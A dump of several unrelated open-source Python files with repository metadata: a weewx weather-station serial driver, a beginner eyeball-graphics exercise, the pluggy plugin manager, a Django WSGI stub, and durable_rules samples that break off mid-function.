log.info('Reading %d records into memory.' % num_to_ask)
else:
log.info('Reading %d records into memory. This could take some time.' % num_to_ask)
yielded = 0
recs = []
data = self.command(cmd)
while data != 'OK':
recs.append(data)
data = self.read()
log.info('Finished reading %d records.' % len(recs))
yielded = 0
for data in recs:
values = data.split(',')
if values[0] == 'REC':
yielded += 1
yield values
elif (values[0] == 'HDR' or values[0] == 'MSG' or
values[0] == 'MIN' or values[0] == 'MAX' or
values[0].startswith('DOWNLOAD')):
pass
else:
log.error("Unexpected record '%s' (%s)" % (values[0], data))
log.debug('Downloaded %d records' % yielded)
class CC3000ConfEditor(weewx.drivers.AbstractConfEditor):
@property
def default_stanza(self):
return """
[CC3000]
# This section is for RainWise MarkIII weather stations and CC3000 logger.
# Serial port such as /dev/ttyS0, /dev/ttyUSB0, or /dev/cuaU0
port = %s
# The station model, e.g., CC3000 or CC3000R
model = CC3000
# The driver to use:
driver = weewx.drivers.cc3000
""" % (CC3000.DEFAULT_PORT,)
def prompt_for_settings(self):
print("Specify the serial port on which the station is connected, for")
print("example /dev/ttyUSB0 or /dev/ttyS0.")
port = self._prompt('port', CC3000.DEFAULT_PORT)
return {'port': port}
# define a main entry point for basic testing. invoke from the weewx root dir:
#
# PYTHONPATH=bin python -m weewx.drivers.cc3000 --help
#
# FIXME: This duplicates all of the functionality in CC3000Conigurator.
# Perhaps pare this down to a version option and, by default,
# polling and printing records (a la, the vantage driver)..
if __name__ == '__main__':
import optparse
import weewx
import weeutil.logger
usage = """%prog [options] [--help]"""
parser = optparse.OptionParser(usage=usage)
parser.add_option('--version', action='store_true',
help='display driver version')
parser.add_option('--test-crc', dest='testcrc', action='store_true',
help='test crc')
parser.add_option('--port', metavar='PORT',
help='port to which the station is connected',
default=CC3000.DEFAULT_PORT)
parser.add_option('--get-version', dest='getver', action='store_true',
help='display firmware version')
parser.add_option('--debug', action='store_true', default=False,
help='emit additional diagnostic information')
parser.add_option('--get-status', dest='status', action='store_true',
help='display memory status')
parser.add_option('--get-channel', dest='getch', action='store_true',
help='display station channel')
parser.add_option('--set-channel', dest='setch', metavar='CHANNEL',
help='set station channel')
parser.add_option('--get-battery', dest='getbat', action='store_true',
help='display battery status')
parser.add_option('--get-current', dest='getcur', action='store_true',
help='display current data')
parser.add_option('--get-memory', dest='getmem', action='store_true',
help='display memory status')
parser.add_option('--get-records', dest='getrec', metavar='NUM_RECORDS',
help='display records from station memory')
parser.add_option('--get-header', dest='gethead', action='store_true',
help='display data header')
parser.add_option('--get-units', dest='getunits', action='store_true',
help='display units')
parser.add_option('--set-units', dest='setunits', metavar='UNITS',
help='set units to ENGLISH or METRIC')
parser.add_option('--get-time', dest='gettime', action='store_true',
help='display station time')
parser.add_option('--set-time', dest='settime', action='store_true',
help='set station time to computer time')
parser.add_option('--get-dst', dest='getdst', action='store_true',
help='display daylight savings settings')
parser.add_option('--set-dst', dest='setdst',
metavar='mm/dd HH:MM,mm/dd HH:MM,[MM]M',
help='set daylight savings start, end, and amount')
parser.add_option('--get-interval', dest='getint', action='store_true',
help='display logging interval, in seconds')
parser.add_option('--set-interval', dest='setint', metavar='INTERVAL',
type=int, help='set logging interval, in seconds')
parser.add_option('--clear-memory', dest='clear', action='store_true',
help='clear logger memory')
parser.add_option('--get-rain', dest='getrain', action='store_true',
help='get rain counter')
parser.add_option('--reset-rain', dest='resetrain', action='store_true',
help='reset rain counter')
parser.add_option('--get-max', dest='getmax', action='store_true',
help='get max counter')
parser.add_option('--reset-max', dest='resetmax', action='store_true',
help='reset max counters')
parser.add_option('--get-min', dest='getmin', action='store_true',
help='get min counter')
parser.add_option('--reset-min', dest='resetmin', action='store_true',
help='reset min counters')
parser.add_option('--poll', metavar='POLL_INTERVAL', type=int,
help='poll interval in seconds')
parser.add_option('--reboot', dest='reboot', action='store_true',
help='reboot the station')
(options, args) = parser.parse_args()
if options.version:
print("%s driver version %s" % (DRIVER_NAME, DRIVER_VERSION))
exit(0)
if options.debug:
DEBUG_SERIAL = 1
DEBUG_CHECKSUM = 1
DEBUG_OPENCLOSE = 1
weewx.debug = 1
weeutil.logger.setup('cc3000', {})
if options.testcrc:
_check_crc(b'OK')
_check_crc(b'REC,2010/01/01 14:12, 64.5, 85,29.04,349, 2.4, 4.2, 0.00, 6.21, 0.25, 73.2,!B82C')
_check_crc(b'MSG,2010/01/01 20:22,CHARGER ON,!4CED')
exit(0)
with CC3000(options.port) as s:
s.flush()
s.wakeup()
s.set_echo()
if options.getver:
print(s.get_version())
if options.reboot:
print('rebooting...')
startup_msgs = s.reboot()
for line in startup_msgs:
print(line)
if options.status:
print("Firmware:", s.get_version())
print("Time:", s.get_time())
print("DST:", s.get_dst())
print("Units:", s.get_units())
print("Memory:", s.get_memory_status())
print("Interval:", s.get_interval() * 60)
print("Channel:", s.get_channel())
print("Charger:", s.get_charger())
print("Baro:", s.get_baro())
print("Rain:", s.get_rain())
print("Max values:", s.get_max())
print("Min values:", s.get_min())
if options.getch:
print(s.get_channel())
if options.setch is not None:
s.set_channel(int(options.setch))
if options.getbat:
print(s.get_charger())
if options.getcur:
print(s.get_current_data())
if options.getmem:
print(s.get_memory_status())
if options.getrec is not None:
i = 0
for r in s.gen_records(int(options.getrec)):
print(i, r)
i += 1
if options.gethead:
print(s.get_header())
if options.getunits:
print(s.get_units())
if options.setunits:
s.set_units(options.setunits)
if options.gettime:
print(s.get_time())
if options.settime:
s.set_time()
if options.getdst:
print(s.get_dst())
if options.setdst:
s.set_dst(options.setdst)
if options.getint:
print(s.get_interval() * 60)
if options.setint:
s.set_interval(int(options.setint) / 60)
if options.clear:
s.clear_memory()
if options.getrain:
print(s.get_rain())
if options.resetrain:
print(s.reset_rain())
if options.getmax:
print(s.get_max())
if options.resetmax:
print(s.reset_max())
if options.getmin:
print(s.get_min())
if options.resetmin:
print(s.reset_min())
if options.poll is not None:
cmd_mode = True
if options.poll == 0:
cmd_mode = False
s.set_auto()
while True:
print(s.get_current_data(cmd_mode))
time.sleep(options.poll)
| [
"tom@tom.org"
] | tom@tom.org |
68d1843dab90410740fd85f5d830ddfa869461ce | 5a9ec9ed961f2eb050704f6e9e54dcecddeb6f1b | /all_eyes_on_you.py | 8baf8f12e628038627489b918e7a1d8430e36b29 | [] | no_license | jristow/startingPythonWork | 51a1553a18e75b5df827c0ca21208c2e66e9a4fb | dfe5ccca0dd493c1758f047cd1b9f853e46aaecc | refs/heads/master | 2021-01-24T03:29:56.573757 | 2018-05-12T03:05:57 | 2018-05-12T03:05:57 | 122,891,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,275 | py | ''' Step 1: Create a graphwin object, draw 5 eyes into it
-Create an eye class that will easily enable drawing an 'eye' into a window
Step 2: Get a mouseclick from the user
Step 3: Move the pupils to 'look' at where the mouse clicked
'''
from graphics import *
class Eyeball:
def __init__(self, win, centerPoint):
self.window = win
self.minX = centerPoint.getX() - 10
self.maxX = centerPoint.getX() + 10
self.minY = centerPoint.getY() - 10
self.maxY = centerPoint.getY() + 10
ulPt = Point( self.minX, self.minY)
lrPt = Point( self.maxX, self.maxY)
self.eyeOutline = Rectangle( ulPt, lrPt )
self.eyeOutline.setFill( 'white' )
self.eyeOutline.draw(win)
self.pupilMinX = centerPoint.getX() - 5
self.pupilMaxX = centerPoint.getX() + 5
pupilMinY = centerPoint.getY() - 5
pupilMaxY = centerPoint.getY() + 5
pupilUlPt = Point(self.pupilMinX, pupilMinY)
pupilLrPt = Point(self.pupilMaxX, pupilMaxY)
self.eyePupil = Rectangle(pupilUlPt, pupilLrPt)
self.eyePupil.setFill('black')
self.eyePupil.draw(win)
def updatePupil(self, newPoint):
dX = 0
if newPoint.getX() <= self.maxX and newPoint.getX() >= self.pupilMaxX:
dX = newPoint.getX() - self.pupilMaxX
elif newPoint.getX() >= self.maxX:
dX = self.maxX - self.pupilMaxX
elif newPoint.getX() >= self.minX and newPoint.getX() <= self.pupilMinX:
dX = newPoint.getX() - self.pupilMinX
elif newPoint.getX() <= self.minX:
dX = self.minX - self.pupilMinX
self.eyePupil.move(dX,0)
def main():
win = GraphWin('Someones Watching Me', 500, 500)
newEye1 = Eyeball(win, Point(100,100))
newEye2 = Eyeball(win, Point(150,150))
newEye3 = Eyeball(win, Point(200,200))
newEye4 = Eyeball(win, Point(250,250))
newEye5 = Eyeball(win, Point(300,300))
newPoint = win.getMouse()
newEye1.updatePupil(newPoint)
newEye2.updatePupil(newPoint)
newEye3.updatePupil(newPoint)
newEye4.updatePupil(newPoint)
newEye5.updatePupil(newPoint)
main()
| [
"noreply@github.com"
] | noreply@github.com |
6f99e6b311c7eecce9e8f157f5fb900757946d82 | 5d67ef491e8b09b5fc15dcc85df593c212552fe0 | /.eggs/pluggy-0.6.0-py3.6.egg/pluggy/__init__.py | 2d7a84dfe1ed8a0b22315c9b58c1b9918bb296e1 | [
"MIT"
] | permissive | dyspop/responsysrest | 5a90827553010c4d3e860dddc9117cb731503864 | 7b8e9edab1808f753be6383c7925529775a4fa89 | refs/heads/master | 2021-03-22T04:18:39.478652 | 2019-05-01T19:26:49 | 2019-05-01T19:26:49 | 110,168,191 | 1 | 1 | MIT | 2018-07-19T14:07:56 | 2017-11-09T21:28:46 | Python | UTF-8 | Python | false | false | 26,219 | py | import inspect
import warnings
from .callers import _multicall, HookCallError, _Result, _legacymulticall
__version__ = "0.6.0"
__all__ = [
"PluginManager",
"PluginValidationError",
"HookCallError",
"HookspecMarker",
"HookimplMarker",
]
class PluginValidationError(Exception):
""" plugin failed validation. """
class HookspecMarker(object):
""" Decorator helper class for marking functions as hook specifications.
You can instantiate it with a project_name to get a decorator.
Calling PluginManager.add_hookspecs later will discover all marked functions
if the PluginManager uses the same project_name.
"""
def __init__(self, project_name):
self.project_name = project_name
def __call__(self, function=None, firstresult=False, historic=False):
""" if passed a function, directly sets attributes on the function
which will make it discoverable to add_hookspecs(). If passed no
function, returns a decorator which can be applied to a function
later using the attributes supplied.
If firstresult is True the 1:N hook call (N being the number of registered
hook implementation functions) will stop at I<=N when the I'th function
returns a non-None result.
If historic is True calls to a hook will be memorized and replayed
on later registered plugins.
"""
def setattr_hookspec_opts(func):
if historic and firstresult:
raise ValueError("cannot have a historic firstresult hook")
setattr(
func,
self.project_name + "_spec",
dict(firstresult=firstresult, historic=historic),
)
return func
if function is not None:
return setattr_hookspec_opts(function)
else:
return setattr_hookspec_opts
class HookimplMarker(object):
""" Decorator helper class for marking functions as hook implementations.
You can instantiate with a project_name to get a decorator.
Calling PluginManager.register later will discover all marked functions
if the PluginManager uses the same project_name.
"""
def __init__(self, project_name):
self.project_name = project_name
def __call__(
self,
function=None,
hookwrapper=False,
optionalhook=False,
tryfirst=False,
trylast=False,
):
""" if passed a function, directly sets attributes on the function
which will make it discoverable to register(). If passed no function,
returns a decorator which can be applied to a function later using
the attributes supplied.
If optionalhook is True a missing matching hook specification will not result
in an error (by default it is an error if no matching spec is found).
If tryfirst is True this hook implementation will run as early as possible
in the chain of N hook implementations for a specfication.
If trylast is True this hook implementation will run as late as possible
in the chain of N hook implementations.
If hookwrapper is True the hook implementations needs to execute exactly
one "yield". The code before the yield is run early before any non-hookwrapper
function is run. The code after the yield is run after all non-hookwrapper
function have run. The yield receives a ``_Result`` object representing
the exception or result outcome of the inner calls (including other hookwrapper
calls).
"""
def setattr_hookimpl_opts(func):
setattr(
func,
self.project_name + "_impl",
dict(
hookwrapper=hookwrapper,
optionalhook=optionalhook,
tryfirst=tryfirst,
trylast=trylast,
),
)
return func
if function is None:
return setattr_hookimpl_opts
else:
return setattr_hookimpl_opts(function)
def normalize_hookimpl_opts(opts):
opts.setdefault("tryfirst", False)
opts.setdefault("trylast", False)
opts.setdefault("hookwrapper", False)
opts.setdefault("optionalhook", False)
class _TagTracer(object):
def __init__(self):
self._tag2proc = {}
self.writer = None
self.indent = 0
def get(self, name):
return _TagTracerSub(self, (name,))
def format_message(self, tags, args):
if isinstance(args[-1], dict):
extra = args[-1]
args = args[:-1]
else:
extra = {}
content = " ".join(map(str, args))
indent = " " * self.indent
lines = ["%s%s [%s]\n" % (indent, content, ":".join(tags))]
for name, value in extra.items():
lines.append("%s %s: %s\n" % (indent, name, value))
return lines
def processmessage(self, tags, args):
if self.writer is not None and args:
lines = self.format_message(tags, args)
self.writer("".join(lines))
try:
self._tag2proc[tags](tags, args)
except KeyError:
pass
def setwriter(self, writer):
self.writer = writer
def setprocessor(self, tags, processor):
if isinstance(tags, str):
tags = tuple(tags.split(":"))
else:
assert isinstance(tags, tuple)
self._tag2proc[tags] = processor
class _TagTracerSub(object):
def __init__(self, root, tags):
self.root = root
self.tags = tags
def __call__(self, *args):
self.root.processmessage(self.tags, args)
def setmyprocessor(self, processor):
self.root.setprocessor(self.tags, processor)
def get(self, name):
return self.__class__(self.root, self.tags + (name,))
class _TracedHookExecution(object):
def __init__(self, pluginmanager, before, after):
self.pluginmanager = pluginmanager
self.before = before
self.after = after
self.oldcall = pluginmanager._inner_hookexec
assert not isinstance(self.oldcall, _TracedHookExecution)
self.pluginmanager._inner_hookexec = self
def __call__(self, hook, hook_impls, kwargs):
self.before(hook.name, hook_impls, kwargs)
outcome = _Result.from_call(lambda: self.oldcall(hook, hook_impls, kwargs))
self.after(outcome, hook.name, hook_impls, kwargs)
return outcome.get_result()
def undo(self):
self.pluginmanager._inner_hookexec = self.oldcall
class PluginManager(object):
""" Core Pluginmanager class which manages registration
of plugin objects and 1:N hook calling.
You can register new hooks by calling ``add_hookspec(module_or_class)``.
You can register plugin objects (which contain hooks) by calling
``register(plugin)``. The Pluginmanager is initialized with a
prefix that is searched for in the names of the dict of registered
plugin objects. An optional excludefunc allows to blacklist names which
are not considered as hooks despite a matching prefix.
For debugging purposes you can call ``enable_tracing()``
which will subsequently send debug information to the trace helper.
"""
def __init__(self, project_name, implprefix=None):
""" if implprefix is given implementation functions
will be recognized if their name matches the implprefix. """
self.project_name = project_name
self._name2plugin = {}
self._plugin2hookcallers = {}
self._plugin_distinfo = []
self.trace = _TagTracer().get("pluginmanage")
self.hook = _HookRelay(self.trace.root.get("hook"))
self._implprefix = implprefix
self._inner_hookexec = lambda hook, methods, kwargs: hook.multicall(
methods, kwargs, firstresult=hook.spec_opts.get("firstresult")
)
def _hookexec(self, hook, methods, kwargs):
# called from all hookcaller instances.
# enable_tracing will set its own wrapping function at self._inner_hookexec
return self._inner_hookexec(hook, methods, kwargs)
def register(self, plugin, name=None):
""" Register a plugin and return its canonical name or None if the name
is blocked from registering. Raise a ValueError if the plugin is already
registered. """
plugin_name = name or self.get_canonical_name(plugin)
if plugin_name in self._name2plugin or plugin in self._plugin2hookcallers:
if self._name2plugin.get(plugin_name, -1) is None:
return # blocked plugin, return None to indicate no registration
raise ValueError(
"Plugin already registered: %s=%s\n%s"
% (plugin_name, plugin, self._name2plugin)
)
# XXX if an error happens we should make sure no state has been
# changed at point of return
self._name2plugin[plugin_name] = plugin
# register matching hook implementations of the plugin
self._plugin2hookcallers[plugin] = hookcallers = []
for name in dir(plugin):
hookimpl_opts = self.parse_hookimpl_opts(plugin, name)
if hookimpl_opts is not None:
normalize_hookimpl_opts(hookimpl_opts)
method = getattr(plugin, name)
hookimpl = HookImpl(plugin, plugin_name, method, hookimpl_opts)
hook = getattr(self.hook, name, None)
if hook is None:
hook = _HookCaller(name, self._hookexec)
setattr(self.hook, name, hook)
elif hook.has_spec():
self._verify_hook(hook, hookimpl)
hook._maybe_apply_history(hookimpl)
hook._add_hookimpl(hookimpl)
hookcallers.append(hook)
return plugin_name
def parse_hookimpl_opts(self, plugin, name):
method = getattr(plugin, name)
if not inspect.isroutine(method):
return
try:
res = getattr(method, self.project_name + "_impl", None)
except Exception:
res = {}
if res is not None and not isinstance(res, dict):
# false positive
res = None
elif res is None and self._implprefix and name.startswith(self._implprefix):
res = {}
return res
def unregister(self, plugin=None, name=None):
""" unregister a plugin object and all its contained hook implementations
from internal data structures. """
if name is None:
assert plugin is not None, "one of name or plugin needs to be specified"
name = self.get_name(plugin)
if plugin is None:
plugin = self.get_plugin(name)
# if self._name2plugin[name] == None registration was blocked: ignore
if self._name2plugin.get(name):
del self._name2plugin[name]
for hookcaller in self._plugin2hookcallers.pop(plugin, []):
hookcaller._remove_plugin(plugin)
return plugin
def set_blocked(self, name):
""" block registrations of the given name, unregister if already registered. """
self.unregister(name=name)
self._name2plugin[name] = None
def is_blocked(self, name):
""" return True if the name blogs registering plugins of that name. """
return name in self._name2plugin and self._name2plugin[name] is None
def add_hookspecs(self, module_or_class):
""" add new hook specifications defined in the given module_or_class.
Functions are recognized if they have been decorated accordingly. """
names = []
for name in dir(module_or_class):
spec_opts = self.parse_hookspec_opts(module_or_class, name)
if spec_opts is not None:
hc = getattr(self.hook, name, None)
if hc is None:
hc = _HookCaller(name, self._hookexec, module_or_class, spec_opts)
setattr(self.hook, name, hc)
else:
# plugins registered this hook without knowing the spec
hc.set_specification(module_or_class, spec_opts)
for hookfunction in hc._wrappers + hc._nonwrappers:
self._verify_hook(hc, hookfunction)
names.append(name)
if not names:
raise ValueError(
"did not find any %r hooks in %r" % (self.project_name, module_or_class)
)
def parse_hookspec_opts(self, module_or_class, name):
method = getattr(module_or_class, name)
return getattr(method, self.project_name + "_spec", None)
def get_plugins(self):
""" return the set of registered plugins. """
return set(self._plugin2hookcallers)
def is_registered(self, plugin):
""" Return True if the plugin is already registered. """
return plugin in self._plugin2hookcallers
def get_canonical_name(self, plugin):
""" Return canonical name for a plugin object. Note that a plugin
may be registered under a different name which was specified
by the caller of register(plugin, name). To obtain the name
of an registered plugin use ``get_name(plugin)`` instead."""
return getattr(plugin, "__name__", None) or str(id(plugin))
def get_plugin(self, name):
""" Return a plugin or None for the given name. """
return self._name2plugin.get(name)
def has_plugin(self, name):
""" Return True if a plugin with the given name is registered. """
return self.get_plugin(name) is not None
def get_name(self, plugin):
""" Return name for registered plugin or None if not registered. """
for name, val in self._name2plugin.items():
if plugin == val:
return name
def _verify_hook(self, hook, hookimpl):
if hook.is_historic() and hookimpl.hookwrapper:
raise PluginValidationError(
"Plugin %r\nhook %r\nhistoric incompatible to hookwrapper"
% (hookimpl.plugin_name, hook.name)
)
# positional arg checking
notinspec = set(hookimpl.argnames) - set(hook.argnames)
if notinspec:
raise PluginValidationError(
"Plugin %r for hook %r\nhookimpl definition: %s\n"
"Argument(s) %s are declared in the hookimpl but "
"can not be found in the hookspec"
% (
hookimpl.plugin_name,
hook.name,
_formatdef(hookimpl.function),
notinspec,
)
)
def check_pending(self):
""" Verify that all hooks which have not been verified against
a hook specification are optional, otherwise raise PluginValidationError"""
for name in self.hook.__dict__:
if name[0] != "_":
hook = getattr(self.hook, name)
if not hook.has_spec():
for hookimpl in hook._wrappers + hook._nonwrappers:
if not hookimpl.optionalhook:
raise PluginValidationError(
"unknown hook %r in plugin %r" % (name, hookimpl.plugin)
)
def load_setuptools_entrypoints(self, entrypoint_name):
""" Load modules from querying the specified setuptools entrypoint name.
Return the number of loaded plugins. """
from pkg_resources import (
iter_entry_points,
DistributionNotFound,
VersionConflict,
)
for ep in iter_entry_points(entrypoint_name):
# is the plugin registered or blocked?
if self.get_plugin(ep.name) or self.is_blocked(ep.name):
continue
try:
plugin = ep.load()
except DistributionNotFound:
continue
except VersionConflict as e:
raise PluginValidationError(
"Plugin %r could not be loaded: %s!" % (ep.name, e)
)
self.register(plugin, name=ep.name)
self._plugin_distinfo.append((plugin, ep.dist))
return len(self._plugin_distinfo)
def list_plugin_distinfo(self):
""" return list of distinfo/plugin tuples for all setuptools registered
plugins. """
return list(self._plugin_distinfo)
def list_name_plugin(self):
""" return list of name/plugin pairs. """
return list(self._name2plugin.items())
def get_hookcallers(self, plugin):
""" get all hook callers for the specified plugin. """
return self._plugin2hookcallers.get(plugin)
def add_hookcall_monitoring(self, before, after):
""" add before/after tracing functions for all hooks
and return an undo function which, when called,
will remove the added tracers.
``before(hook_name, hook_impls, kwargs)`` will be called ahead
of all hook calls and receive a hookcaller instance, a list
of HookImpl instances and the keyword arguments for the hook call.
``after(outcome, hook_name, hook_impls, kwargs)`` receives the
same arguments as ``before`` but also a :py:class:`_Result`` object
which represents the result of the overall hook call.
"""
return _TracedHookExecution(self, before, after).undo
def enable_tracing(self):
""" enable tracing of hook calls and return an undo function. """
hooktrace = self.hook._trace
def before(hook_name, methods, kwargs):
hooktrace.root.indent += 1
hooktrace(hook_name, kwargs)
def after(outcome, hook_name, methods, kwargs):
if outcome.excinfo is None:
hooktrace("finish", hook_name, "-->", outcome.get_result())
hooktrace.root.indent -= 1
return self.add_hookcall_monitoring(before, after)
def subset_hook_caller(self, name, remove_plugins):
""" Return a new _HookCaller instance for the named method
which manages calls to all registered plugins except the
ones from remove_plugins. """
orig = getattr(self.hook, name)
plugins_to_remove = [plug for plug in remove_plugins if hasattr(plug, name)]
if plugins_to_remove:
hc = _HookCaller(
orig.name, orig._hookexec, orig._specmodule_or_class, orig.spec_opts
)
for hookimpl in orig._wrappers + orig._nonwrappers:
plugin = hookimpl.plugin
if plugin not in plugins_to_remove:
hc._add_hookimpl(hookimpl)
# we also keep track of this hook caller so it
# gets properly removed on plugin unregistration
self._plugin2hookcallers.setdefault(plugin, []).append(hc)
return hc
return orig
def varnames(func):
"""Return tuple of positional and keywrord argument names for a function,
method, class or callable.
In case of a class, its ``__init__`` method is considered.
For methods the ``self`` parameter is not included.
"""
cache = getattr(func, "__dict__", {})
try:
return cache["_varnames"]
except KeyError:
pass
if inspect.isclass(func):
try:
func = func.__init__
except AttributeError:
return (), ()
elif not inspect.isroutine(func): # callable object?
try:
func = getattr(func, "__call__", func)
except Exception:
return ()
try: # func MUST be a function or method here or we won't parse any args
spec = _getargspec(func)
except TypeError:
return (), ()
args, defaults = tuple(spec.args), spec.defaults
if defaults:
index = -len(defaults)
args, defaults = args[:index], tuple(args[index:])
else:
defaults = ()
# strip any implicit instance arg
if args:
if inspect.ismethod(func) or (
"." in getattr(func, "__qualname__", ()) and args[0] == "self"
):
args = args[1:]
assert "self" not in args # best naming practises check?
try:
cache["_varnames"] = args, defaults
except TypeError:
pass
return args, defaults
class _HookRelay(object):
""" hook holder object for performing 1:N hook calls where N is the number
of registered plugins.
"""
def __init__(self, trace):
self._trace = trace
class _HookCaller(object):
def __init__(self, name, hook_execute, specmodule_or_class=None, spec_opts=None):
self.name = name
self._wrappers = []
self._nonwrappers = []
self._hookexec = hook_execute
self._specmodule_or_class = None
self.argnames = None
self.kwargnames = None
self.multicall = _multicall
self.spec_opts = spec_opts or {}
if specmodule_or_class is not None:
self.set_specification(specmodule_or_class, spec_opts)
def has_spec(self):
return self._specmodule_or_class is not None
def set_specification(self, specmodule_or_class, spec_opts):
assert not self.has_spec()
self._specmodule_or_class = specmodule_or_class
specfunc = getattr(specmodule_or_class, self.name)
# get spec arg signature
argnames, self.kwargnames = varnames(specfunc)
self.argnames = ["__multicall__"] + list(argnames)
self.spec_opts.update(spec_opts)
if spec_opts.get("historic"):
self._call_history = []
def is_historic(self):
return hasattr(self, "_call_history")
def _remove_plugin(self, plugin):
def remove(wrappers):
for i, method in enumerate(wrappers):
if method.plugin == plugin:
del wrappers[i]
return True
if remove(self._wrappers) is None:
if remove(self._nonwrappers) is None:
raise ValueError("plugin %r not found" % (plugin,))
def _add_hookimpl(self, hookimpl):
"""A an implementation to the callback chain.
"""
if hookimpl.hookwrapper:
methods = self._wrappers
else:
methods = self._nonwrappers
if hookimpl.trylast:
methods.insert(0, hookimpl)
elif hookimpl.tryfirst:
methods.append(hookimpl)
else:
# find last non-tryfirst method
i = len(methods) - 1
while i >= 0 and methods[i].tryfirst:
i -= 1
methods.insert(i + 1, hookimpl)
if "__multicall__" in hookimpl.argnames:
warnings.warn(
"Support for __multicall__ is now deprecated and will be"
"removed in an upcoming release.",
DeprecationWarning,
)
self.multicall = _legacymulticall
def __repr__(self):
return "<_HookCaller %r>" % (self.name,)
def __call__(self, *args, **kwargs):
if args:
raise TypeError("hook calling supports only keyword arguments")
assert not self.is_historic()
if self.argnames:
notincall = set(self.argnames) - set(["__multicall__"]) - set(kwargs.keys())
if notincall:
warnings.warn(
"Argument(s) {} which are declared in the hookspec "
"can not be found in this hook call".format(tuple(notincall)),
stacklevel=2,
)
return self._hookexec(self, self._nonwrappers + self._wrappers, kwargs)
def call_historic(self, proc=None, kwargs=None):
""" call the hook with given ``kwargs`` for all registered plugins and
for all plugins which will be registered afterwards.
If ``proc`` is not None it will be called for for each non-None result
obtained from a hook implementation.
"""
self._call_history.append((kwargs or {}, proc))
# historizing hooks don't return results
res = self._hookexec(self, self._nonwrappers + self._wrappers, kwargs)
for x in res or []:
proc(x)
def call_extra(self, methods, kwargs):
""" Call the hook with some additional temporarily participating
methods using the specified kwargs as call parameters. """
old = list(self._nonwrappers), list(self._wrappers)
for method in methods:
opts = dict(hookwrapper=False, trylast=False, tryfirst=False)
hookimpl = HookImpl(None, "<temp>", method, opts)
self._add_hookimpl(hookimpl)
try:
return self(**kwargs)
finally:
self._nonwrappers, self._wrappers = old
def _maybe_apply_history(self, method):
"""Apply call history to a new hookimpl if it is marked as historic.
"""
if self.is_historic():
for kwargs, proc in self._call_history:
res = self._hookexec(self, [method], kwargs)
if res and proc is not None:
proc(res[0])
class HookImpl(object):
def __init__(self, plugin, plugin_name, function, hook_impl_opts):
self.function = function
self.argnames, self.kwargnames = varnames(self.function)
self.plugin = plugin
self.opts = hook_impl_opts
self.plugin_name = plugin_name
self.__dict__.update(hook_impl_opts)
if hasattr(inspect, "getfullargspec"):
def _getargspec(func):
return inspect.getfullargspec(func)
else:
def _getargspec(func):
return inspect.getargspec(func)
if hasattr(inspect, "signature"):
def _formatdef(func):
return "%s%s" % (func.__name__, str(inspect.signature(func)))
else:
def _formatdef(func):
return "%s%s" % (
func.__name__,
inspect.formatargspec(*inspect.getargspec(func)),
)
| [
"dyspop@gmail.com"
] | dyspop@gmail.com |
58dda2f670c81b11dcb9b32b1a8eecf07da6dd98 | ddad20f9a5a43ff0b0f4970bc5fad7cd17731c5a | /shoppingmall/shoppingmall/wsgi.py | 0dee8197d435b55d9ceabcf2c7fec241ecbeee1b | [] | no_license | kimmyphua/coldStorageDjango | 6378a078f9333d419bd4f0fe4dbd9161c7cfd2fb | 67edcd9f7472eabc64e913860bbfe589cdfdba7a | refs/heads/master | 2023-06-26T06:08:43.193614 | 2021-07-02T04:28:08 | 2021-07-02T04:28:08 | 382,230,693 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for shoppingmall project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'shoppingmall.settings')
application = get_wsgi_application()
| [
"kimberlyphuaweyhan@gmail.com"
] | kimberlyphuaweyhan@gmail.com |
7df222a3096911a226c3f83992df6226f8d6e79b | 1392d3ad3b04f321831c37d7e8441da8796691aa | /testpy/testsamples.py | a8f124737029fa48143c31476bd49f9ca71384db | [
"MIT"
] | permissive | cosmic-chichu/rules | 0ca82adc8d70fa9e4afbba92283ffa6c8f6e6cbe | f7de1c32a1e836888f54a2aecf9a51f29a7387b3 | refs/heads/master | 2021-09-17T11:26:13.352429 | 2018-07-01T16:14:04 | 2018-07-01T16:14:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,582 | py | from durable.lang import *
import threading
import datetime
with statechart('expense'):
with state('input'):
@to('denied')
@when_all((m.subject == 'approve') & (m.amount > 1000))
def denied(c):
print ('expense denied')
@to('pending')
@when_all((m.subject == 'approve') & (m.amount <= 1000))
def request(c):
print ('requesting expense approva')
with state('pending'):
@to('approved')
@when_all(m.subject == 'approved')
def approved(c):
print ('expense approved')
@to('denied')
@when_all(m.subject == 'denied')
def denied(c):
print ('expense denied')
state('denied')
state('approved')
with ruleset('animal'):
@when_all(c.first << (m.predicate == 'eats') & (m.object == 'flies'),
(m.predicate == 'lives') & (m.object == 'water') & (m.subject == c.first.subject))
def frog(c):
c.assert_fact({ 'subject': c.first.subject, 'predicate': 'is', 'object': 'frog' })
@when_all(c.first << (m.predicate == 'eats') & (m.object == 'flies'),
(m.predicate == 'lives') & (m.object == 'land') & (m.subject == c.first.subject))
def chameleon(c):
c.assert_fact({ 'subject': c.first.subject, 'predicate': 'is', 'object': 'chameleon' })
@when_all((m.predicate == 'eats') & (m.object == 'worms'))
def bird(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'bird' })
@when_all((m.predicate == 'is') & (m.object == 'frog'))
def green(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'green' })
@when_all((m.predicate == 'is') & (m.object == 'chameleon'))
def grey(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'grey' })
@when_all((m.predicate == 'is') & (m.object == 'bird'))
def black(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'black' })
@when_all(+m.subject)
def output(c):
print ('Fact: {0} {1} {2}'.format(c.m.subject, c.m.predicate, c.m.object))
@when_start
def start(host):
host.assert_fact('animal', { 'subject': 'Kermit', 'predicate': 'eats', 'object': 'flies' })
host.assert_fact('animal', { 'subject': 'Kermit', 'predicate': 'lives', 'object': 'water' })
host.assert_fact('animal', { 'subject': 'Greedy', 'predicate': 'eats', 'object': 'flies' })
host.assert_fact('animal', { 'subject': 'Greedy', 'predicate': 'lives', 'object': 'land' })
host.assert_fact('animal', { 'subject': 'Tweety', 'predicate': 'eats', 'object': 'worms' })
with ruleset('test'):
# antecedent
@when_all(m.subject == 'World')
def say_hello(c):
# consequent
